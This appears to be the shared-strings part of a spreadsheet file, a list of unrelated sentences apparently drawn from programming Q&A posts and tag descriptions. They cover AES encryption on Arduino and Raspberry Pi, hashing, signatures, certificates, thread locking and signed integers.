When I try again (1-3 times) finally it can decrypt the SAME text successfully and send the response to FE.</t>
  </si>
  <si>
    <t>Arduino
Java
Arduino output
Install AES library in Arduino and run as usual
Ready
N_BLOCK: 16
set_key 128 -&gt;0 took 596us
encrypt -&gt;0 took 1136us
decrypt -&gt;0 took 1548us
plain:  6BC1BEE22E409F96E93D7E117393172A
key:    2B7E151628AED2A6ABF7158809CF4F3C
iv:     000102030405060708090A0B0C0D0E0F
enc:    7649ABAC8119B246CEE98E9B12E9197D
dec:    6BC1BEE22E409F96E93D7E117393172A
Java output
Put the code in Encryptor3.java, then from command line
macbookproz:aes_cbc_128 matteo$ javac Encryptor3.java 
macbookproz:aes_cbc_128 matteo$ java Encryptor3
message (hex):         6bc1bee22e409f96e93d7e117393172a
key (hex):             2b7e151628aed2a6abf7158809cf4f3c
iv (hex):              000102030405060708090A0B0C0D0E0F
match (hex):           7649abac8119b246cee98e9b12e9197d
Encrypted (hex):       7649abac8119b246cee98e9b12e9197d
Decrypted (hex):       6bc1bee22e409f96e93d7e117393172a</t>
  </si>
  <si>
    <t>reader/writer locks)
Parallel specifications on track to be published around the same time as C++14:
Filesystem library
Networking library (to start small and grow)
Concepts Lite</t>
  </si>
  <si>
    <t>The first part is a small patch against the PHP core, that implements a few low-level protections against buffer overflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections.</t>
  </si>
  <si>
    <t>Is it the bluetooth module is in some kind of locked mode?</t>
  </si>
  <si>
    <t>Therefore I used semaphores to block access.</t>
  </si>
  <si>
    <t>There's probably something about locks or semaphores or mutex...es (mutices?)</t>
  </si>
  <si>
    <t>The radio data rate of 802.15.4 networks is 250kbps.</t>
  </si>
  <si>
    <t>It will be stored in base64 encryption in a DynamoDB table.</t>
  </si>
  <si>
    <t>I am using a Raspberry 3 B+ to communicate to a safety plc with a constant cycle time of 2ms.</t>
  </si>
  <si>
    <t>If they're all defined then we define a few new identifiers.</t>
  </si>
  <si>
    <t>signing key: any symmetric key for the {device id} identity.</t>
  </si>
  <si>
    <t>The CRC32 of the cryptogram is calculated over command, key number and the not yet encrypted cryptogram.</t>
  </si>
  <si>
    <t xml:space="preserve">
signed overflow is when carry out is not equal to carry in.</t>
  </si>
  <si>
    <t>If I dont care whether others on my network see it, then confidentiality doesnt matter.</t>
  </si>
  <si>
    <t>The interesting this about VSDB is that it does this with no locking whatsoever, not even file locks.</t>
  </si>
  <si>
    <t>The cipher's designers were Roger Needham and David Wheeler of the Cambridge Computer Laboratory, and the algorithm was presented in 1998.</t>
  </si>
  <si>
    <t>Lower values are more transparent, and higher values are more opaque</t>
  </si>
  <si>
    <t>Another way, Is to look at it as a crypto problem and the 3 bit cksum is a hash.</t>
  </si>
  <si>
    <t>I believe that the problem has something to do with the fact that Java variables cannot be unsigned.</t>
  </si>
  <si>
    <t>try 45 for slow servers
            $username = $server["smtpuser"]; // the login for your smtp
            $password = $server["smtppass"];           // the password for your smtp
            $localhost = "127.0.0.1";      // Defined for the web server.</t>
  </si>
  <si>
    <t>You entered: h e l l o
Enter a 1 digit number.</t>
  </si>
  <si>
    <t>You entered: w a s s u p m a n
Enter a 1 digit number.</t>
  </si>
  <si>
    <t>You entered: h o w y a d o i n
Enter a 1 digit number.</t>
  </si>
  <si>
    <t>You entered: i t w o r k s
Enter a 1 digit number.</t>
  </si>
  <si>
    <t>Im receiving an error on line 42 say that my authenticator is not defined.</t>
  </si>
  <si>
    <t>Please be informed that for encryption and decryption purpose I am using AES code using this source.</t>
  </si>
  <si>
    <t>I'm trying to put AES encryption but i have problems with that.</t>
  </si>
  <si>
    <t>The Android code seems to have quite a bit more involved like creating keys and salts.</t>
  </si>
  <si>
    <t>I have the following code in a separate method running on its own thread into which I pass username, server, and command.</t>
  </si>
  <si>
    <t>I am checking the encryption algorithms supported by FileZilla.</t>
  </si>
  <si>
    <t>I got this error:
invalid conversion from 'const char*' to 'const uint8_t* {aka const
  unsigned char*}' [-fpermissive]
I do not know why this happens.</t>
  </si>
  <si>
    <t>The encrypted string of the NodeMCU is not getting decrypted by node.js.</t>
  </si>
  <si>
    <t>I want to measure altitude, ambient temperature and the state of the safety mechanism (locked or not).</t>
  </si>
  <si>
    <t>I have an undocumented bus running at 200kps (it not a car bus) that I need to sniff, there are 3 devices on the bus.</t>
  </si>
  <si>
    <t>Instead of an expected R\d\d\d\13 I expect between them, I'm getting 7 signed bytes.</t>
  </si>
  <si>
    <t>But the encrypted string won't decrypt properly on PHP.</t>
  </si>
  <si>
    <t>When I tried modifying the ".plaintext" in the array it causes the encryption and thus decryption to fail.</t>
  </si>
  <si>
    <t>So it went from locking out once every day nearly to ~5 days before it locks itself out.</t>
  </si>
  <si>
    <t>I literally just get the first letter of the message back I tried to encrypt.</t>
  </si>
  <si>
    <t>I tried to enable the Stretch backports repo but that didn't work: apt update doesn't work because the repo is not signed and I can't get it to sign.</t>
  </si>
  <si>
    <t>The steering wheel can rotate several times lock to lock.</t>
  </si>
  <si>
    <t>The request is always blocked by CORS because self-signed certificates.</t>
  </si>
  <si>
    <t>What you need is an encoding that uses one byte for 0 - 255, and matches unicode.</t>
  </si>
  <si>
    <t>Hashing
At least in games, a hash function could probably do what you want.</t>
  </si>
  <si>
    <t>There are not OS native primitives preventing contention on the devices.</t>
  </si>
  <si>
    <t>If the packet data happens to contain that identifier, then you have to "escape" (aka byte stuff) it.</t>
  </si>
  <si>
    <t>Even printf may get invalid data as it expects 3 floats and you are supllying 3 chars.</t>
  </si>
  <si>
    <t>Not only because it's in-efficiently, but also because the Thread Safety is not guaranteed.</t>
  </si>
  <si>
    <t>PS:
The numbers 2000 and 5000 don't fit into the byte, so the last two bytes that you send are probably corrupted.</t>
  </si>
  <si>
    <t>if your secret is  and your GET parameters are sensorId=123&amp;temperature=21 you calculate your SHA-256 hash over these.</t>
  </si>
  <si>
    <t>the logon is done in Arduino)
As a simplistic solution, you can use some hardcoded random secret, e.g.</t>
  </si>
  <si>
    <t>crypto/ -
This folder contains the source code for many encryption algorithms.</t>
  </si>
  <si>
    <t>As long as you have internet connectivity, it doesn't matter if you go via WiFi of GPRS.</t>
  </si>
  <si>
    <t>The service should register the device with IoT Hub and provide some logic that limits the number of devices that any user can register.</t>
  </si>
  <si>
    <t>You can lock the boot loader, jump straight into code and other things.</t>
  </si>
  <si>
    <t>As your SIM card is aware of its Ki, it can decrypt the random number and return it.</t>
  </si>
  <si>
    <t>The access bits are protected by a redundancy mechanism.</t>
  </si>
  <si>
    <t>If your target frequency is 2-3 times smaller you are in safe range.</t>
  </si>
  <si>
    <t>Again, you should send an invalid digit after your number (e.g.</t>
  </si>
  <si>
    <t>I will avoid using anything besides basic threads and locks in the code.</t>
  </si>
  <si>
    <t>// The second byte is saying&gt; MASK bit is set.</t>
  </si>
  <si>
    <t>Part of it seems to be that you are casting  values to signed somewhere inadvertently, which causes 0xB3 to be printed as 0xFFFFFFB3.</t>
  </si>
  <si>
    <t>core/repository/deployment/server/jaggeryapps/portal/configs/designer.json (identityAlias)
core/repository/deployment/server/jaggeryapps/devicemgt/app/conf/app-conf.json (identityAlias)
core/repository/conf/etc/webapp-authenticator-config.xml (there would be 3 entries)
2) wso2 IoT server uses JWT token for the server to server communication.</t>
  </si>
  <si>
    <t>There may be some other kind of IC that you could off-load the TLS encryption to, but still have the Arduino Uno doing the networking - but I am not sure if anything like this actually exists.</t>
  </si>
  <si>
    <t>The ADC on this chip returns a 24 bit signed value.</t>
  </si>
  <si>
    <t>Here, part of the secret is the state in which the encryption algorithm is in.</t>
  </si>
  <si>
    <t>The only precondition is that the chosen thread must either have not masked the signal, or must wait for it using sigwait.</t>
  </si>
  <si>
    <t>You cannot convert int implicitly to anonymous enum.</t>
  </si>
  <si>
    <t>Changing noauth to auth within "fona" did not help me, neither editing "chap-secrets" and/or "pap-secrets".</t>
  </si>
  <si>
    <t>Depending on your device's authentication requirement you even do not need to pair with device (of course if your device does not need authentication and/or encryption).</t>
  </si>
  <si>
    <t>If the cookie data is small (fewer than 4096 bytes), you might store it using the EEPROM class.</t>
  </si>
  <si>
    <t>For BLE, the way to achieve encryption is through the pairing mechanism, i.e.</t>
  </si>
  <si>
    <t>Signed to unsigned conversion in C - is it always safe?</t>
  </si>
  <si>
    <t>WPA and WPA2 encryption requires a password with minimum 8 characters.</t>
  </si>
  <si>
    <t>RC4 in cryptography is a widely used stream cipher.</t>
  </si>
  <si>
    <t>A Java KeyStore (JKS) is a repository of cryptographic keys and certificates - used for instance in TLS encryption.</t>
  </si>
  <si>
    <t>sha256 stands for Secure Hash Algorithm-256.</t>
  </si>
  <si>
    <t>The 512-bit version of the Secure Hash Algorithm.</t>
  </si>
  <si>
    <t>FowlerNollVo is a non-cryptographic hash function created by Glenn Fowler, Landon Curt Noll, and Phong Vo.</t>
  </si>
  <si>
    <t>Whirlpool is a cryptographic hash function designed by Rijmen and Barreto.</t>
  </si>
  <si>
    <t>Vigenre cipher is an encryption algorithm developed in 1553 and was considered uncrackable until the middle of the 19th century.</t>
  </si>
  <si>
    <t>Secret operators are not actually secret, and they are not actually operators either.</t>
  </si>
  <si>
    <t>Cryptico is an attempt to implement "an encryption system utilizing RSA and AES for javascript"</t>
  </si>
  <si>
    <t>Data security is the main priority for organizations of every size and genre.</t>
  </si>
  <si>
    <t>Also based on this block cipher is the GOST hash function.</t>
  </si>
  <si>
    <t>While it can be used to sign other data, it is mainly used to sign XML documents.</t>
  </si>
  <si>
    <t>Self-signed certificates are a type of security certificates that are signed by the same entity that actually uses the certificate.</t>
  </si>
  <si>
    <t>A password hash is a hash digest of a password obtained using a one-way hashing algorithm (not to be confused with [password-encryption]).</t>
  </si>
  <si>
    <t>There is no such thing as one-way encryption, unless secure hashing is meant.</t>
  </si>
  <si>
    <t>It uses Phony gem (E164 international phone number normalizing, splitting, formatting).</t>
  </si>
  <si>
    <t>In cryptography, CMAC is a MAC (message authentication code) based on a block cipher such as AES</t>
  </si>
  <si>
    <t>Oracle Real Application Security (RAS) provides row and column based security to database.</t>
  </si>
  <si>
    <t>Authorisation is the most common scenario for using JWT.</t>
  </si>
  <si>
    <t>BouncyCastle is a cryptography API providing various cryptography, encryption, and security protocols.</t>
  </si>
  <si>
    <t>Microsoft Authenticode (TM) is Microsoft's implementation of digitally code signing executables.</t>
  </si>
  <si>
    <t>Crypto++ Library is a free C++ class library of cryptographic schemes.</t>
  </si>
  <si>
    <t>PKCS #1 is a security standard, published by RSA Security, which describes the RSA algorithm and padding schemes.</t>
  </si>
  <si>
    <t>ADO.NET does not provide thread safety for SqlConnection, nor any of the objects that use it (such as SqlCommand or SqlDataReader) - these objects should be used on the same thread as the SqlConnection, and by only one thread at once.</t>
  </si>
  <si>
    <t>Locking and unlocking the service database.</t>
  </si>
  <si>
    <t>Without using an HSM, cryptographic keys are exposed in RAM during their generation and use.</t>
  </si>
  <si>
    <t>Whirlpool (sometimes styled WHIRLPOOL) is a cryptographic hash function.</t>
  </si>
  <si>
    <t>new.x = old.x * at.a + old.y * at.c + at.x
new.y = old.x * at.b + old.y * at.d + at.y
The identity transform will transform a point to itself.</t>
  </si>
  <si>
    <t>It cannot be forged, assuming the private key is kept secret.</t>
  </si>
  <si>
    <t>It is a function of the data signed and thus can't be claimed to be the signature for other data as well.</t>
  </si>
  <si>
    <t>Which cryptographic hash function should I choose?</t>
  </si>
  <si>
    <t>Do not rely on system defaults, especially when encrypting on one system and decrypting on another.</t>
  </si>
  <si>
    <t xml:space="preserve">
A thread-safe, mutable sequence of characters.</t>
  </si>
  <si>
    <t>ThreadSanitizer (aka tsan, not "Thread Sanitizer") is a data race detector for C/C++ programs.</t>
  </si>
  <si>
    <t>It's a thread-safe random-access list.</t>
  </si>
  <si>
    <t>Unauthorised clones of the ZX81 were produced in a number of countries.</t>
  </si>
  <si>
    <t>(The software variant STM might use locks for synchronization).</t>
  </si>
  <si>
    <t>This class provides a thread-safe variant of HashMap.</t>
  </si>
  <si>
    <t>Encryption and decryption keys used for PBE are derived from a user password.</t>
  </si>
  <si>
    <t>The JWE cryptographic mechanisms
encrypt and provide integrity protection for an arbitrary sequence of
octets.</t>
  </si>
  <si>
    <t>By design, blockchains are inherently resistant to modification of the data.</t>
  </si>
  <si>
    <t>Row locking is more common in modern RDBMS than in older ones.</t>
  </si>
  <si>
    <t>In mysql, for instance, the myisam engine would use table locking.</t>
  </si>
  <si>
    <t>Additionally, SecureRandom must produce non-deterministic output.</t>
  </si>
  <si>
    <t>A pure python Java KeyStore file parser, including private key decryption.</t>
  </si>
  <si>
    <t>Support for digitally signed installs and uninstalls.</t>
  </si>
  <si>
    <t>TOML is designed to map unambiguously
  to a hash table.</t>
  </si>
  <si>
    <t>See user behavior and measure attribution from a single dashboard.</t>
  </si>
  <si>
    <t>CMAC is a MAC message-authentication-code based on a block cipher such as AES.</t>
  </si>
  <si>
    <t>SHA stands for Secure Hash Algorithm.</t>
  </si>
  <si>
    <t>Oracle jarsigner tool can be used for both JAR signing and signature verification.</t>
  </si>
  <si>
    <t>Encryption is also used to protect data in transit, for example data being transferred via networks (e.g.</t>
  </si>
  <si>
    <t>404.11  Request contains double escape sequence.</t>
  </si>
  <si>
    <t>If chmod parameter is less than 3 digits, the first owner and then group permissions are assumed zero.</t>
  </si>
  <si>
    <t>SignedInfo - Contains information on what elements should be signed and how they should be signed.</t>
  </si>
  <si>
    <t>XML Signatures have been subject to legal disputes.</t>
  </si>
  <si>
    <t>Useful Links
How Encryption Works
Password Encryption -- Short Answer: Don't.</t>
  </si>
  <si>
    <t>The TPM also implements some common cryptographic algorithms.</t>
  </si>
  <si>
    <t>CAS operations is often used in multithreading to achieve lockless synchronization.</t>
  </si>
  <si>
    <t>Field collapsing can also be used to suppress duplicate documents.</t>
  </si>
  <si>
    <t>This protocol has long been deprecated in favor of stronger encryption algorithms.</t>
  </si>
  <si>
    <t>Referencing an uninitialized row in a table.</t>
  </si>
  <si>
    <t>Kill the sessions that are preventing the exclusive lock.</t>
  </si>
  <si>
    <t>You always want your private keys to be kept secret, but it doesn't matter if a public key is intercepted.</t>
  </si>
  <si>
    <t>Do not change locked version strings without careful consideration.</t>
  </si>
  <si>
    <t>cryptography.io is a Python library which exposes cryptographic recipes and primitives.</t>
  </si>
  <si>
    <t>In Public Key Infrastructure cryptography a CSR is a Certificate Signing Request</t>
  </si>
  <si>
    <t>In a typical public key infrastructure (PKI) scheme, the signature will be of a certificate authority (CA).</t>
  </si>
  <si>
    <t>It is well suited for
encrypting files or entire directories in an operating system context.</t>
  </si>
  <si>
    <t>Several database vendors provide row-level security mechanisms.</t>
  </si>
  <si>
    <t>In both cases the 0x01 command sent by the PC has extra bits set so that a loopback of its own data wouldn't fool the PC.</t>
  </si>
  <si>
    <t>sha-2 refers to the family of secure hash functions consisting of SHA-224, SHA-256, 
SHA-384, and SHA-512.</t>
  </si>
  <si>
    <t>A certificate is a digitally signed statement from one entity, saying that the public key of some other entity has a particular value.</t>
  </si>
  <si>
    <t>libcrypto consists of a number of sub-libraries that implement the individual algorithms.</t>
  </si>
  <si>
    <t>For example:
user:password
The hashed password is typically "UNIX crypt" style, encrypted in either MD5 or SHA1 as common alternatives.</t>
  </si>
  <si>
    <t>In addition, it is practically impossible to derive the private key with only the knowledge of the public key.</t>
  </si>
  <si>
    <t>I'm told that Microsoft has repaired the data -- potentially Azure wide, but certainly the data that affected our Subscriptions and their IotHubs.</t>
  </si>
  <si>
    <t>PBKDF2 (Password-Based Key Derivation Function 2) is a key derivation function that is part of RSA Laboratories' Public-Key Cryptography Standards (PKCS) series.</t>
  </si>
  <si>
    <t>PKCS#11 is a standard that defines the Cryptoki API for accessing and operating cryptographic tokens such as smartcards and HSM.</t>
  </si>
  <si>
    <t>[8] RC4 has become part of some commonly used encryption protocols and standards, including WEP and WPA for wireless cards and TLS.</t>
  </si>
  <si>
    <t>The INF file example on this page also refers to a CAT-file, which I assume this is some sort of driver signature, and I don't know how to generate this (or if I even need to).</t>
  </si>
  <si>
    <t>So I believe as an anti brute force attack mechanism routers don't like it when devices repeatedly try to connect in too short a time span, sometimes even 10 seconds is too short!</t>
  </si>
  <si>
    <t>Decryption is the process of converting encrypted data back into its original form, so it can be understood.</t>
  </si>
  <si>
    <t>ConcurrentDictionary is a .Net thread-safe collection of key-value pairs that can be accessed by multiple threads at the same time.</t>
  </si>
  <si>
    <t>A maven plugin used to build signatures of APIs and to check classes against previously generated signatures.</t>
  </si>
  <si>
    <t>It is generic, in that it may be applied and used in a wide range of application areas where automated fingerprint recognition is involved.</t>
  </si>
  <si>
    <t>Used for important mode indications, for
example, some applications put a Caps Lock indicator in the status
bar.</t>
  </si>
  <si>
    <t>It generates distorted images of letters and numbers that are easily decipherable to humans -- but not to spam bots.</t>
  </si>
  <si>
    <t>Among other things, RSA publishes a series of standards related to public-key cryptography known as PKCS.</t>
  </si>
  <si>
    <t>In some cases, combining multiple syntactically-invalid code pieces can result in syntactically-valid code containing logical errors.</t>
  </si>
  <si>
    <t>Caller ID spoofing is the practice of causing the telephone network to display a number on the recipient's Caller ID display that is not that of the actual originating station.</t>
  </si>
  <si>
    <t>Individually the bytes are safe from activating AX.25 termination sequence but combined bytes results in a problem.</t>
  </si>
  <si>
    <t>The security rules that apply to URL downloading with the URLStream class are identical to the rules applied to URLLoader objects.</t>
  </si>
  <si>
    <t>NTLM has been deprecated for many uses as it doesn't support the latest standards:
Implementers should be aware that NTLM does not support any recent cryptographic methods, such as AES or SHA-256.</t>
  </si>
  <si>
    <t>Animal Sniffer is a maven plugin used to build signatures of APIs and to check classes against previously generated signatures.</t>
  </si>
  <si>
    <t>PHP was designed specifically to avoid these kind of notifications, and with good reason: They're an extremely vulnerable attack vector.</t>
  </si>
  <si>
    <t>The addresses of transaction senders and receivers as well as the transferred amounts are obfuscated so that transactions on the Monero blockchain cannot be linked to given user identity.</t>
  </si>
  <si>
    <t>I am trying to store integer values of RFID tag numbers sent over bluetooth serial into an array so that the tag will be identified by the reader when passed by it.</t>
  </si>
  <si>
    <t>When i scan a card, I get a UID number stored in my python file as "backData"  I would like to store all of my users in a separate file (IE: csv or txt file), instead of at the top of my code and then read that file to authenticate and extract the relevant row.</t>
  </si>
  <si>
    <t>The 7th and 8th bit of MAC addresses are special: Bit 8 == 0 for unicast Bit 8 == 1 for multicast
Bit 7 is also special - 0 = globally unique (assigned to a manufacturer to use) and 1 = locally administered (we should use these addresses!)</t>
  </si>
  <si>
    <t>Note that the entry in the secondary table is optional, while the entry in the main table is mandatory in order to maintain referential integrity.</t>
  </si>
  <si>
    <t>Because the check value has a fixed length, the function that generates it is occasionally used as a hash function.wikipedia
The most commonly used polynomial lengths are:
CRC-8: 9 bits
CRC-16: 17 bits
CRC-32: 33 bits
CRC-64: 65 bits
A truly excellent tutorial on CRC's is Ross Williams' "Painless Guide to CRC Detection Algorithms", which can also be found here, here, here, here, and here.</t>
  </si>
  <si>
    <t>Winlogon is the component of Microsoft Windows operating systems that is responsible for handling the secure attention sequence, loading the user profile on logon, and optionally locking the computer when a screensaver is running (requiring another authentication step).</t>
  </si>
  <si>
    <t>From the GitHub repository
Argon2 is a password-hashing function that summarizes the state of the art in the design of memory-hard functions and can be used to hash passwords for credential storage, key derivation, or other applications.</t>
  </si>
  <si>
    <t>By using versioning of cryptography packages, it focuses on ciphers believed to be among the most secure current encryption methods, and also has a codebase of around 4000 lines, about 1% of either OpenVPN or IPSEC, making security audits easier.</t>
  </si>
  <si>
    <t>Advances in sensor data collection technology, such as pervasive and embedded devices, and RFID Technology have lead to a large number of smart devices which are connected to the internet and continuously transmit their data over time.</t>
  </si>
  <si>
    <t>Once this is done, your raspberry pi will trust your computer and won't ask for a password when someone connect with that key you generated (so keep it secret!).</t>
  </si>
  <si>
    <t>To optimize code in such cases, GPIOPinMask is used.</t>
  </si>
  <si>
    <t>Font Lock mode is a minor mode of GNU Emacs.</t>
  </si>
  <si>
    <t>High security level.</t>
  </si>
  <si>
    <t>No secret branch conditions.</t>
  </si>
  <si>
    <t>SQL Server and Azure SQL Database provide Row-Level Security (RLS).</t>
  </si>
  <si>
    <t>I have an XTEA encryption/decryption routine that's defined as follows and is verified to work.</t>
  </si>
  <si>
    <t>Either side might be blocking tcp communication at the OS level.</t>
  </si>
  <si>
    <t>Hardware:
You also need to be aware of hardware, using USB Webcam is not a good choice because of slow speed.</t>
  </si>
  <si>
    <t>Private key that occurs in asymmetric cryptography algorithms such as RSA and Diffie-Hellman as the counterpart to a public key.</t>
  </si>
  <si>
    <t>It has been implemented as a stackable file system and provides filesystem-level encryption.</t>
  </si>
  <si>
    <t>NSURLDownload can also decode commonly used encoding schemes such as MacBinary, BinHex and gzip.</t>
  </si>
  <si>
    <t>This is usually employed in high security environments as a factor in user authentication.</t>
  </si>
  <si>
    <t>Mutual authentication
A common example of mutual authentication is an employer's VPN that authenticates both the employer and the employee using X.509 certificates.</t>
  </si>
  <si>
    <t>In row-level security, a user can ask to view a set of data e.g.</t>
  </si>
  <si>
    <t>These ciphers do not offer any practical levels of security.</t>
  </si>
  <si>
    <t>This security level provides some services unprompted, while still placing many limits on the application.</t>
  </si>
  <si>
    <t>Locality-sensitive hashing  reduces the dimensionality of high-dimensional data.</t>
  </si>
  <si>
    <t>I did some research and have implemented  throughout to maintain a signed 16 bit system however I have come across a new issue.</t>
  </si>
  <si>
    <t>It makes randomized bits(see code) and prints the bits in sets of 8.</t>
  </si>
  <si>
    <t>and I need to use a variable with only 1 byte for transmission purposes, but I need this to be signed.</t>
  </si>
  <si>
    <t>I presume these are all interpreted by the compiler.Can char be changed to always behave as unsigned instead of signed?</t>
  </si>
  <si>
    <t>The whole process of creating a signature requires algorithms like encodeURL, base64encode, and hmac-sha1.</t>
  </si>
  <si>
    <t>I stumbled upon a page about password hashing and adding salt.</t>
  </si>
  <si>
    <t>Since I was dealing with a single byte here, I didn't know I'd need atomic access guards.</t>
  </si>
  <si>
    <t>On AWS IOT site, It is written that you can add countless number of devices.But I need to know that is there any limitation on generating certificates.</t>
  </si>
  <si>
    <t>I am attempting to create a sign-in, sign-out program using python and mysql on a raspberry pi.</t>
  </si>
  <si>
    <t>(My application has several dependencies, not all of which are signed, so to sign it would mean going through the ILMerge mill or similar which I would rather avoid if I can.)</t>
  </si>
  <si>
    <t>Press f or r
    kkksdsSD opened
    Command connected
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 52 of 200 allowed.</t>
  </si>
  <si>
    <t>Bank vault systems that have a tactile number pad for pin entry are vulnerable to misuse by a thief.</t>
  </si>
  <si>
    <t>Then I found that NodeMCU supports only a few signature algorithms, so I changed it to SHA256, as I know it is supported.</t>
  </si>
  <si>
    <t>But when I come to try connecting via the browser, using a pre-signed URL, I have hit a stumbling block.</t>
  </si>
  <si>
    <t>As far as I know one needs to register the thumbprints of the primary and secondary certificates with the IoT Hub, which is ok.
Later on we would like to use the primary certificate to authenticate a device with the IoT Hub.</t>
  </si>
  <si>
    <t>I tried googling about this but this topic seems to vague and ends up about Disk encryption.</t>
  </si>
  <si>
    <t>I assume it suffices to put forward client certificate and key (signed by the same CA that signed server cert/key) without the use of the ca.crt?</t>
  </si>
  <si>
    <t>I have parsed the data into hex buffers and split the data as appropriate (iv, encryption key, hmac, encrypted data).</t>
  </si>
  <si>
    <t>I have created a self-signed CA certificate on my computer, certificate request on the pi, and signed the request with the CA keys on my computer.</t>
  </si>
  <si>
    <t>How to settle (Self-signed) CA certificates and Client certificates and Username/password on a Self-signed device connection?</t>
  </si>
  <si>
    <t>I am currently working on a project to decrypt a stream of bytes coming from a smart meter using a ESP32 with the ESP-IDF toolchain.</t>
  </si>
  <si>
    <t>I am able to lock/unlock/set codes on the lock through this Ubuntu VM.</t>
  </si>
  <si>
    <t>Is there a way to create a separate folder with a username and password that can only access that folder and not the entire www/html directory?</t>
  </si>
  <si>
    <t>Assuming that the username and password are correct why do you think mutt and sendmail are not sending emails to their destinations?</t>
  </si>
  <si>
    <t>I am creating script for lock building by raspberry pi and electormagnetic locks.</t>
  </si>
  <si>
    <t>When decoding two dimensional barcodes (CODABAR), the success rate is very low.</t>
  </si>
  <si>
    <t>You could encrypt the whole disk or the volume using LUKS or dm-crypt if your distribution supports it.</t>
  </si>
  <si>
    <t>You create the digest by HMACing the other stuff with a shared secret.</t>
  </si>
  <si>
    <t>first likely issue, is this symptom sounds like a signed vs un-signed conflict.</t>
  </si>
  <si>
    <t>Yes, more than one sensor may be connected to the i2c bus as long as there is no address conflict.</t>
  </si>
  <si>
    <t>You can do that by changing the encryption method to a faster one such as arcfour or blowfish.</t>
  </si>
  <si>
    <t>The function ase128_enc_single(), encrypts a single block, which is 16 characters.</t>
  </si>
  <si>
    <t>You shouldn't have to change anything on the pi to allow ssh (assuming you didn't block ssh to begin with).</t>
  </si>
  <si>
    <t>Second, you can't see the raw bytes of a detected advertisement with the  command.</t>
  </si>
  <si>
    <t>You can use Java sockets for that, but you will need root access as pointed out in the most upvoted answer of this thread about pinging with java.</t>
  </si>
  <si>
    <t>The error Received TLS alert from the server: Handshake failed (40) means that FileZilla and the server cannot agree on an encryption (algorithm and/or strength).</t>
  </si>
  <si>
    <t>If you haven't already, you might want to try installing the unlimited strength encryption policy files into your JDK/JRE you are running Maven from.</t>
  </si>
  <si>
    <t>Example: 
payload[i] is 0x81
unsigned char -&gt; 129, then &gt;0 
signed char -&gt; -127, then &lt;0 
Your cast via (char) is redundant (and unstable like i said)
I don't give sample code because I don't understand Your goal.</t>
  </si>
  <si>
    <t>function1 would acquire a blocking lock and release it when it was done.</t>
  </si>
  <si>
    <t>The bss size is the size of uninitialized data - of course uninitialized data does not need to be stored in the executable file.)</t>
  </si>
  <si>
    <t>Default 0.
                                                    bool checkCRC       ///&lt; In: True =&gt; The last two bytes of the response is assumed to be a CRC_A that must be validated.
                                 )</t>
  </si>
  <si>
    <t>You can buy a code signing certificate an re-sign the CAT file that comes with the drivers.</t>
  </si>
  <si>
    <t>You can use this option to reduce code size slightly in code that doesn't need to be thread-safe.</t>
  </si>
  <si>
    <t>psk="very secret passphrase" defines your passphrase to access the router.</t>
  </si>
  <si>
    <t>While writing this response I've spotted that you should really consider using signed values in your sine tables.</t>
  </si>
  <si>
    <t>Knowing that a certificate must be within a date range to be considered "active," an error saying that it is not activated would mean that it is outside that range.</t>
  </si>
  <si>
    <t>BLE devices only require pairing if they are using encryption on their characteristics.</t>
  </si>
  <si>
    <t>Use  to monitor on another thread so it doesn't lock your main process.</t>
  </si>
  <si>
    <t>Below is an example of authentication using bluetoothctl:
Authentication methods in Bluetooth Low Energy depends on IO capabilities of the connecting devices.</t>
  </si>
  <si>
    <t>File write operation looks more secure as a separate function.</t>
  </si>
  <si>
    <t>However, given the values you're multiplying by, you seem to be trying to make a mask from four signed bytes.</t>
  </si>
  <si>
    <t>Some lower level code will be registered for some sort of I/O event.</t>
  </si>
  <si>
    <t xml:space="preserve"> was added in PHP 7.2.0, so anything running PHP &lt; 7.2.0, like your RspberryPi, will not be able to validate hashes created using that algorithm.</t>
  </si>
  <si>
    <t>Getting a device's token is not possible: when devices are registered, their tokens are salted and hashed.</t>
  </si>
  <si>
    <t>at the end of the program will block the thread until an edge is detected.</t>
  </si>
  <si>
    <t>As long as you link the USER to the UUID, internet will never ever matter.</t>
  </si>
  <si>
    <t>Any instance members are not guaranteed to be thread safe.</t>
  </si>
  <si>
    <t>process IDs in a running PC, primary keys in a database table, user names in a networked system, etc.</t>
  </si>
  <si>
    <t>Hardware Security Modules are devices designed to protect cryptographic key material and accelerate certain operations.</t>
  </si>
  <si>
    <t>A thread safe, open source, pure Java, implementation of the javax.comm API.</t>
  </si>
  <si>
    <t>It also reduces lock contention for multi-threaded programs.</t>
  </si>
  <si>
    <t>Commonly, user accounts are represented as database objects.</t>
  </si>
  <si>
    <t>LTPA - Lightweight Third-Party Authentication is a IBM provided mechanism to achieve Single Sign-On between IBM WebSphere servers and Lotus Domino servers.</t>
  </si>
  <si>
    <t>Evercookie is a javascript API that produces extremely persistent cookies in a browser.</t>
  </si>
  <si>
    <t>JSON Web Encryption (JWE; RFC 7516) represents encrypted content using JSON-based data structures.</t>
  </si>
  <si>
    <t>Off-the-Record messaging (OTR) is protocol for secure messaging that provides confidentiality, (deniable) authenticity and forward secrecy.</t>
  </si>
  <si>
    <t>The DOMTokenList interface represents a set of space-separated tokens.</t>
  </si>
  <si>
    <t>Encrypted Core Data SQLite provides encrypted storage for persistent core data.</t>
  </si>
  <si>
    <t>Pure functional programming is thread safe.</t>
  </si>
  <si>
    <t>git-crypt enables encryption and decryption of files in a git repository.</t>
  </si>
  <si>
    <t>Random access and random index insertion/removal have O(n) complexity and are usually unimplemented.</t>
  </si>
  <si>
    <t>mathematical scheme for demonstrating the authenticity of a digital message or document (Wikipedia).</t>
  </si>
  <si>
    <t>Other modes, such as CCM and GCM, offer authenticated encryption which places an integrity assurance over the encrpyted data.</t>
  </si>
  <si>
    <t>Fakes is different from Moles, however, so moving from Moles to Fakes will require some modifications to your code.</t>
  </si>
  <si>
    <t>The file extension  commonly refers to a Java keystore as defined in the Java Cryptography Architecture (JCA) specification.</t>
  </si>
  <si>
    <t>A multi-dimensional hash is a flexible, nested structure where hash values are allowed to be other hashes.</t>
  </si>
  <si>
    <t>They should, in particular, be written to be thread-safe and to avoid deadlocks insofar as possible.</t>
  </si>
  <si>
    <t>SHA-3 is a family of cryptographic hash functions, intended to replace sha1 and sha2.</t>
  </si>
  <si>
    <t>Application:
In order to encrypt text, you need to choose a word, , and the encryption table.</t>
  </si>
  <si>
    <t>In the main table, the primary key is just declared in the usual way.</t>
  </si>
  <si>
    <t>The technique is based on digital signatures and hash functions.</t>
  </si>
  <si>
